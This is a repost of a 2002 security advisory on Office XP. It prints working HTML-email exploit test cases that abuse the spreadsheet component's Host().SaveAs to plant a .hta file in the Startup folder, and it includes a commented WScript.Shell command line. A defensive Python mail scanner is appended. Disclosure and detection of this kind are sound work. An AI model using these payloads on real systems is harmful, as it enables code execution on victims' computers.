More Office XP problems (Version 2.0)

Giovanni Coppa giannicoppa@yahoo.it
Thu 4 Apr 2002 17:45:25 CEST


> More Office XP problems
> 
> Systems affected:
> Office XP
> 
> Risk: High
> Date: 31 March 2002
> Updated: 3 April 2002 (check corrections, 3 is added)
> 
> Legal Notice:
> This Advisory is Copyright (c) 2002 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or distribute parts
> of it without the author's written permission.
> If you want to link to this content use the URL:
> http://www.guninski.com/m$oxp-2.html
> 
> Disclaimer:
> The information in this advisory is believed to be true though
> it may be false.
> The opinions expressed in this advisory and program are my own and
> not of any company. The usual standard disclaimer applies,
> especially the fact that Georgi Guninski is not liable for any damages
> caused by direct or indirect use of the information or functionality
> provided by this advisory or program. Georgi Guninski bears no
> responsibility for content or misuse of this advisory or program or
> any derivatives thereof.
> 
> 
> Corrections: (made on 3 April 2002)
> 
> At http://www.idg.net/ic_840081_1794_9-10000.html is written:
> -----------------
>    As for the second vulnerability, Microsoft said it does
> "not as yet have a work-around for the second issue, but note
> that even in the worst case it could only be used to create files --
> not to execute them or take any other action on the user's computer."
> -----------------
> 
> I don't agree with this statement - execution of code in this case is easy.
> I am waiting for an official reply from them.
> The following testcase (3) shows that arbitrary code may be executed.
> 
> 3.
> The following must be put in HTML email which should be opened with
> Outlook XP and the user should choose reply or forward.
> Probably it may also be embedded in .doc or .xls file.
> The effect is shown after the user logs out and logs in again.
> ----------------------------------------
> <h1>
> Hehe. Trying to sell trustworthy computing.
> </h1>
> 
> <object
>     classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
>      v:shapes="_x0000_s1026" class=shape width=81 height=81
>      u1:shapes="_x0000_s1025">
>      <param name=DataType value=XMLURL>
>      <param name=XMLData
>      value="&lt;?xml version=&quot;1.0&quot;?&gt;
> &lt;ss:Workbook xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;
>  xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;
>  xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;
>  xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;
>  xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;
>  &lt;x:ExcelWorkbook&gt;
>   &lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;
>   &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;
>  &lt;/x:ExcelWorkbook&gt;
>  &lt;ss:Styles&gt;
>   &lt;ss:Style ss:ID=&quot;Default&quot;&gt;
>    &lt;ss:Alignment ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot; ss:Vertical=&quot;Bottom&quot;
>     ss:ReadingOrder=&quot;Context&quot;/&gt;
>    &lt;ss:Borders&gt;
>    &lt;/ss:Borders&gt;
>    &lt;ss:Font ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot; ss:Bold=&quot;0&quot;
>     ss:Italic=&quot;0&quot; ss:Underline=&quot;None&quot;/&gt;
>    &lt;ss:Interior ss:Color=&quot;Automatic&quot; ss:Pattern=&quot;None&quot;/&gt;
>    &lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;
>    &lt;ss:Protection ss:Protected=&quot;1&quot;/&gt;
>   &lt;/ss:Style&gt;
>  &lt;/ss:Styles&gt;
>  &lt;c:ComponentOptions&gt;
>   &lt;c:Label&gt;
>    &lt;c:Caption&gt;Microsoft Office Spreadsheet&lt;/c:Caption&gt;
>   &lt;/c:Label&gt;
>   &lt;c:PreventPropBrowser/&gt;
>   &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;
>   &lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;
>   &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;
>  &lt;/c:ComponentOptions&gt;
>  &lt;x:WorkbookOptions&gt;
>   &lt;c:OWCVersion&gt;10.0.0.2621         &lt;/c:OWCVersion&gt;
>   &lt;x:DisableUndo/&gt;
>  &lt;/x:WorkbookOptions&gt;
>  &lt;ss:Worksheet ss:Name=&quot;Sheet1&quot;&gt;
>   &lt;x:WorksheetOptions&gt;
>    &lt;x:Selected/&gt;
>    &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;
>    &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;
>    &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;
>    &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;
>    &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;
>   &lt;/x:WorksheetOptions&gt;
>   &lt;c:WorksheetOptions&gt;
>   &lt;/c:WorksheetOptions&gt;
>   &lt;ss:Table ss:ExpandedColumnCount=&quot;1&quot; ss:ExpandedRowCount=&quot;1&quot;
>    ss:DefaultColumnWidth=&quot;48.0&quot; ss:DefaultRowHeight=&quot;12.75&quot;&gt;
>    &lt;ss:Row&gt;
>     &lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;../Start Menu/Programs/StartUp/gggg5.hta&quot;,8)'&gt;
>      &lt;ss:Data ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;
>     &lt;/ss:Cell&gt;
>    &lt;/ss:Row&gt;
>   &lt;/ss:Table&gt;
>  &lt;/ss:Worksheet&gt;
>  &lt;ss:Worksheet ss:Name=&quot;Sheet2&quot;&gt;
>   &lt;x:WorksheetOptions&gt;
>    &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;
>    &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;
>    &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;
>    &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;
>    &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;
>   &lt;/x:WorksheetOptions&gt;
>   &lt;c:WorksheetOptions&gt;
>   &lt;/c:WorksheetOptions&gt;
>  &lt;/ss:Worksheet&gt;
>  &lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;
>   &lt;x:WorksheetOptions&gt;
>    &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;
>    &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;
>    &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;
>    &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;
>    &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;
>   &lt;/x:WorksheetOptions&gt;
>   &lt;c:WorksheetOptions&gt;
>   &lt;/c:WorksheetOptions&gt;
>  &lt;/ss:Worksheet&gt;
>  &lt;o:DocumentProperties&gt;
>   &lt;o:Author&gt;ad&lt;/o:Author&gt;
>   &lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;
>   &lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;
>   &lt;o:Company&gt;g&lt;/o:Company&gt;
>   &lt;o:Version&gt;10.2625&lt;/o:Version&gt;
>  &lt;/o:DocumentProperties&gt;
>  &lt;o:OfficeDocumentSettings&gt;
>   &lt;o:DownloadComponents/&gt;
>   &lt;o:LocationOfComponents HRef=&quot;file:///E:\&quot;/&gt;
>  &lt;/o:OfficeDocumentSettings&gt;
> &lt;/ss:Workbook&gt;
> ">
>      <param name=AllowPropertyToolbox value=0>
>      <param name=AutoFit value=0>
>      <param name=Calculation value=-4105>
>      <param name=Caption value="Microsoft Office Spreadsheet">
>      <param name=DisplayColumnHeadings value=-1>
>      <param name=DisplayGridlines value=-1>
>      <param name=DisplayHorizontalScrollBar value=-1>
>      <param name=DisplayOfficeLogo value=-1>
>      <param name=DisplayPropertyToolbox value=0>
>      <param name=DisplayRowHeadings value=-1>
>      <param name=DisplayTitleBar value=0>
>      <param name=DisplayToolbar value=-1>
>      <param name=DisplayVerticalScrollBar value=-1>
>      <param name=DisplayWorkbookTabs value=-1>
>      <param name=EnableEvents value=-1>
>      <param name=MaxHeight value="80%">
>      <param name=MaxWidth value="80%">
>      <param name=MoveAfterReturn value=-1>
>      <param name=MoveAfterReturnDirection value=-4121>
>      <param name=RightToLeft value=0>
>      <param name=ScreenUpdating value=-1>
>      <param name=EnableUndo value=0>
>     </object>
> <script>
> i=3;
> while (i--) confirm("Trustworthy?");
> //x=new ActiveXObject("WScript.Shell");
> //x.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
> </script>
> ------------------------------------------
> 
> 
> Description:
> Actually there are at least two vulnerabilities in Office XP.
> 1. It is possible to embed active content (object + script) in HTML mail
> which is triggered if the user chooses reply or forward to the mail.
> This opens an exploit scenario for forcing the user to visit a page
> in the internet zone of IE at least. For another exploit scenario
> check (2)
> 2. There is a bug in ms spreadsheet component. Namely in its Host()
> function which may be exploited with the help of (1) or probably from
> any document opened with Office application. This buggy function
> allows creating files with arbitrary names and their content may be
> specified to some extent at which is sufficient to place an
> executable file (.hta) in user's startup directory which may lead to
> taking full control over user's computer.
> This probably may be called cross application scripting because
> one application uses object from another application.
> 
> 
> Details:
> The following must be put in HTML email which should be opened with
> Outlook XP and the user should choose reply or forward.
> 
> 1.
> --------------------------------------
> <OBJECT id=WebBrowser1 height=150 width=300 classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
> <PARAM NAME="ExtentX" VALUE="7938">
> <PARAM NAME="ExtentY" VALUE="3969">
> <PARAM NAME="ViewMode" VALUE="0">
> <PARAM NAME="Offline" VALUE="0">
> <PARAM NAME="Silent" VALUE="0">
> <PARAM NAME="RegisterAsBrowser" VALUE="1">
> <PARAM NAME="RegisterAsDropTarget" VALUE="1">
> <PARAM NAME="AutoArrange" VALUE="0">
> <PARAM NAME="NoClientEdge" VALUE="0">
> <PARAM NAME="AlignLeft" VALUE="0">
> <PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
> <PARAM NAME="Location" VALUE="about:/dev/random&lt;script&gt;while (42) alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')&lt;/script&gt;">
> <PARAM NAME="ReadyState" VALUE="4">
> </OBJECT>
> -------------------------------------
> 
> 
> 2.
> The office spreadsheet component is something like mini excel.
> It may be embedded in web pages (seems not exploitable) and in
> office documents (seems exploitable).
> It supports the Host() function which returns the hosting object.
> So if you put in formula '=Host().SaveAs("name")' file with name
> shall be created.
> 
> [Note, lines may be wrapped]
> ---------------------------------------
> <h1>
> Hehe. Triyng to sell trustworthy computing.
> </h1>
> <object
>     classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
>      v:shapes="_x0000_s1026" class=shape width=81 height=81
>      u1:shapes="_x0000_s1025">
>      <param name=DataType value=XMLURL>
>      <param name=XMLData
>      value="&lt;?xml version=&quot;1.0&quot;?&gt;
> &lt;ss:Workbook xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;
>  xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;
>  xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;
>  xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;
>  xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;
>  &lt;x:ExcelWorkbook&gt;
>   &lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;
>   &lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;
>  &lt;/x:ExcelWorkbook&gt;
>  &lt;ss:Styles&gt;
>   &lt;ss:Style ss:ID=&quot;Default&quot;&gt;
>    &lt;ss:Alignment ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot; ss:Vertical=&quot;Bottom&quot;
>     ss:ReadingOrder=&quot;Context&quot;/&gt;
>    &lt;ss:Borders&gt;
>    &lt;/ss:Borders&gt;
>    &lt;ss:Font ss:FontName=&quot;Arial&quot; ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot; ss:Bold=&quot;0&quot;
>     ss:Italic=&quot;0&quot; ss:Underline=&quot;None&quot;/&gt;
>    &lt;ss:Interior ss:Color=&quot;Automatic&quot; ss:Pattern=&quot;None&quot;/&gt;
>    &lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;
>    &lt;ss:Protection ss:Protected=&quot;1&quot;/&gt;
>   &lt;/ss:Style&gt;
>  &lt;/ss:Styles&gt;
>  &lt;c:ComponentOptions&gt;
>   &lt;c:Label&gt;
>    &lt;c:Caption&gt;Microsoft Office Spreadsheet&lt;/c:Caption&gt;
>   &lt;/c:Label&gt;
>   &lt;c:PreventPropBrowser/&gt;
>   &lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;
>   &lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;
>   &lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;
>  &lt;/c:ComponentOptions&gt;
>  &lt;x:WorkbookOptions&gt;
>   &lt;c:OWCVersion&gt;10.0.0.2621         &lt;/c:OWCVersion&gt;
>   &lt;x:DisableUndo/&gt;
>  &lt;/x:WorkbookOptions&gt;
>  &lt;ss:Worksheet ss:Name=&quot;Sheet1&quot;&gt;
>   &lt;x:WorksheetOptions&gt;
>    &lt;x:Selected/&gt;
>    &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;
>    &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;
>    &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;
>    &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;
>    &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;
>   &lt;/x:WorksheetOptions&gt;
>   &lt;c:WorksheetOptions&gt;
>   &lt;/c:WorksheetOptions&gt;
>   &lt;ss:Table ss:ExpandedColumnCount=&quot;1&quot; ss:ExpandedRowCount=&quot;1&quot;
>    ss:DefaultColumnWidth=&quot;48.0&quot; ss:DefaultRowHeight=&quot;12.75&quot;&gt;
>    &lt;ss:Row&gt;
>     &lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;
>      &lt;ss:Data ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;
>     &lt;/ss:Cell&gt;
>    &lt;/ss:Row&gt;
>   &lt;/ss:Table&gt;
>  &lt;/ss:Worksheet&gt;
>  &lt;ss:Worksheet ss:Name=&quot;Sheet2&quot;&gt;
>   &lt;x:WorksheetOptions&gt;
>    &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;
>    &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;
>    &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;
>    &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;
>    &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;
>   &lt;/x:WorksheetOptions&gt;
>   &lt;c:WorksheetOptions&gt;
>   &lt;/c:WorksheetOptions&gt;
>  &lt;/ss:Worksheet&gt;
>  &lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;
>   &lt;x:WorksheetOptions&gt;
>    &lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;
>    &lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;
>    &lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;
>    &lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;
>    &lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;
>   &lt;/x:WorksheetOptions&gt;
>   &lt;c:WorksheetOptions&gt;
>   &lt;/c:WorksheetOptions&gt;
>  &lt;/ss:Worksheet&gt;
>  &lt;o:DocumentProperties&gt;
>   &lt;o:Author&gt;ad&lt;/o:Author&gt;
>   &lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;
>   &lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;
>   &lt;o:Company&gt;g&lt;/o:Company&gt;
>   &lt;o:Version&gt;10.2625&lt;/o:Version&gt;
>  &lt;/o:DocumentProperties&gt;
>  &lt;o:OfficeDocumentSettings&gt;
>   &lt;o:DownloadComponents/&gt;
>   &lt;o:LocationOfComponents HRef=&quot;file:///E:\&quot;/&gt;
>  &lt;/o:OfficeDocumentSettings&gt;
> &lt;/ss:Workbook&gt;
> ">
>      <param name=AllowPropertyToolbox value=0>
>      <param name=AutoFit value=0>
>      <param name=Calculation value=-4105>
>      <param name=Caption value="Microsoft Office Spreadsheet">
>      <param name=DisplayColumnHeadings value=-1>
>      <param name=DisplayGridlines value=-1>
>      <param name=DisplayHorizontalScrollBar value=-1>
>      <param name=DisplayOfficeLogo value=-1>
>      <param name=DisplayPropertyToolbox value=0>
>      <param name=DisplayRowHeadings value=-1>
>      <param name=DisplayTitleBar value=0>
>      <param name=DisplayToolbar value=-1>
>      <param name=DisplayVerticalScrollBar value=-1>
>      <param name=DisplayWorkbookTabs value=-1>
>      <param name=EnableEvents value=-1>
>      <param name=MaxHeight value="80%">
>      <param name=MaxWidth value="80%">
>      <param name=MoveAfterReturn value=-1>
>      <param name=MoveAfterReturnDirection value=-4121>
>      <param name=RightToLeft value=0>
>      <param name=ScreenUpdating value=-1>
>      <param name=EnableUndo value=0>
>     </object>
> ---------------------------------
> 
> Workaround/Solution:
> The solution is to get a real mail client and office applications.
> Workaround for this particular problem is:
> For (1) - disable everything that contains "active" in IE.
> For (2) and (3) - (Have not tested it personally)
> Deregister and delete the ms office spreadsheet component
> Vendor status:
> 
> Microsoft was notified on 17 March 2002.
> They had 2 weeks to produce a patch but didn't.
--------------------- 
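
For mail administrators, the markers the advisory's test cases share (the two control CLSIDs, a formula calling a method on Host(), and inline script) can be checked at the gateway. The following is an added example, not part of the advisory or the original post; the names `scan_message`, `ActiveContentScanner` and the sample message are assumptions made for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# CLSIDs quoted in the advisory's test cases.
FLAGGED_CLSIDS = {
    "0002E551-0000-0000-C000-000000000046": "Office Spreadsheet component",
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser control",
}
# A spreadsheet formula that calls a method on the hosting object.
HOST_CALL = re.compile(r"=\s*host\s*\(\s*\)\s*\.\s*(\w+)", re.IGNORECASE)

class ActiveContentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {name: value or "" for name, value in attrs}
        if tag == "object":
            clsid = attrs.get("classid", "").upper()
            clsid = clsid[6:] if clsid.startswith("CLSID:") else clsid
            if clsid in FLAGGED_CLSIDS:
                self.findings.append(("object", FLAGGED_CLSIDS[clsid]))
        elif tag == "param":
            # HTMLParser has already decoded &lt; and &quot; in the value,
            # so the embedded workbook XML can be searched as plain text.
            for match in HOST_CALL.finditer(attrs.get("value", "")):
                self.findings.append(("host-call", match.group(1)))
        elif tag == "script":
            self.findings.append(("script", "inline"))

def scan_message(raw):
    """Return (kind, detail) findings for each text/html part of a message."""
    scanner = ActiveContentScanner()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            body = part.get_payload(decode=True).decode(charset, "replace")
            scanner.feed(body)
    scanner.close()
    return scanner.findings

# Constructed sample message (not the advisory's test case).
SAMPLE = (
    "Subject: constructed sample\n"
    "Content-Type: text/html; charset=us-ascii\n\n"
    '<object classid="CLSID:0002E551-0000-0000-C000-000000000046" id=s1>'
    "<param name=XMLData value=\"&lt;ss:Cell ss:Formula="
    "'=HOST().SaveAs(&quot;example.txt&quot;)'/&gt;\"></object>"
    "<script>void 0;</script>\n"
)
```

Any non-empty result is a reason to quarantine the message or strip its HTML part before delivery.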
